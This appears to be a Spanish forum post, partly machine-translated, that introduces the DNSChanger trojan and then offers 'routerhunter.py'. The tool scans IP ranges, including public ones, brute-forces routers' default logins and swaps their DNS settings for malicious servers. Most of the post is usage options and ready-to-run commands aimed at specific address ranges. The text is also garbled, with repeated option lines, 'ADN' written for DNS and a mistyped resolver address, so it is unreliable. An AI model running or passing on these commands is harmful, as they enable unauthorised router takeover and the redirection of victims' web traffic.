El DNSChanger es un troyano capaz de dirigir peticiones de los usuarios a sitios ilegales. En la práctica, este malware tiene la capacidad de cambiar la configuración DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos. Imagina, por ejemplo, que su sistema está infectado con este malware, lo que podría suceder es que el usuario tenga acceso a un sitio en particular (por ejemplo. Facebook.com) puede ser enviada a un sitio web no solicitados y potencialmente ilegal.
Requerimientos
Citar
import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime
from datetime import datetime
USO
Citar
-range 192.168.1.0-255, --range 192.168.1.0-255 Set range of IP
-bruteforce, --bruteforce Performs brute force with users and passwords standards, and soon after defines the malicious DNS.
-startip 192.168.*.*, --startip 192.168.*.* Start - IP range customized with wildcard / 201.*.*.*
-endip 192.168.*.*, --endip 192.168.*.* End - IP range customized with wildcard / 201.*.*.*
-dns1 8.8.8.8, --dns1 8.8.8.8 Define malicious dns1
-dns2 8.8.4.4, --dns2 8.8.4.4 Define malicious dns2
--threads 10 Set threads numbers
-rip, --randomip Randomizing ips routers
-lmtip 10, --limitip 10 Define limite random ip
-bruteforce, --bruteforce Performs brute force with users and passwords standards, and soon after defines the malicious DNS.
-startip 192.168.*.*, --startip 192.168.*.* Start - IP range customized with wildcard / 201.*.*.*
-endip 192.168.*.*, --endip 192.168.*.* End - IP range customized with wildcard / 201.*.*.*
-dns1 8.8.8.8, --dns1 8.8.8.8 Define malicious dns1
-dns2 8.8.4.4, --dns2 8.8.4.4 Define malicious dns2
--threads 10 Set threads numbers
-rip, --randomip Randomizing ips routers
-lmtip 10, --limitip 10 Define limite random ip
Comandos
Citar
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
Escáner de IP gama:
Citar
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
IP range customized with wildcard / Ex: –startip 201.*.*.* – –endip 201.*.*.*
Citar
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
La fuerza bruta con usuarios y contraseñas en los routers que requiere autenticación, obligando a la alteración del ADN – DSLink 260E.
Citar
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10
AUTOR: Jhonathan Davi A.K.A jh00nbr
GITHUB: https://github.com/jh00nbr/